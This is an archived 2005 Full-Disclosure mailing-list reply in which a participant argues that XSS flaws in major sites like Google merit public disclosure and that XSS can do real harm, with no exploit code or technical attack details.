[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] XSS vulnerabilities in Google.com

To: GroundZero Security <fd@xxxxxxx>
Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
From: Mohit Muthanna <mohit.muthanna@xxxxxxxxx>
Date: Wed, 21 Dec 2005 09:02:08 -0500

On 12/21/05, GroundZero Security <fd@xxxxxxx> wrote:
>
> are we starting to post vulnerabilities in specific websites now rather than
> daemons/clients etc. ?

When it's a website with a user-base as large as what Google has, yes.

When there is a possibility that user accounts can be compromised, yes.

> i mean there are thousands of websites which are vulnerable to xss,sql
> injection or worse because of their
> custom scripts.

Sure, but "google != howardsblog.com". A large part of the population
(including myself) relies on Google's various services for day-to-day
use. I sure as hell would not feel comfortable knowing that I'm using
a service that can potentially leak my information.

If there is a vulnerability, no matter how trivial, the public needs to know.

> in my opinion this should be posted to the website owners if
> you feel like, but its of no real use
> to the security community.

That's quite a blanket statement to make. I'm sure a few people in the
"security community" would like to know that there exists a
vulnerability in a Google service.

> hm another thing i'm wondering about is, is it
> legal to just audit a website without
> asking the owner if its ok ?

No. But a site need not be audited to discover a bug.

> how will he know its not a real attack? ok as
> for xss there cant be much harm done
> to the server itself,

XSS can do a lot of harm. A compromised administrator account is
generally a compromised server. There are some good XSS resources on
the web you can read up on.

The bug that was discovered by the parent poster may not lead to a
server compromise; but that is no reason to discount or underestimate
XSS.

> but what if, for example, you cause a DoS through
> testing certain variables for overflows ?

Then, my friend, you have discovered a bug.

Mohit.

--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS vulnerabilities in Google.com
  - From: GroundZero Security

References:
- [Full-disclosure] XSS vulnerabilities in Google.com
  - From: Watchfire Research
- Re: [Full-disclosure] XSS vulnerabilities in Google.com
  - From: GroundZero Security

Prev by Date: Re: [Full-disclosure] XSS vulnerabilities in Google.com
Next by Date: Re: [Full-disclosure] N3td3v poll
Previous by thread: Re: [Full-disclosure] XSS vulnerabilities in Google.com
Next by thread: Re: [Full-disclosure] XSS vulnerabilities in Google.com
Index(es):
- Date
- Thread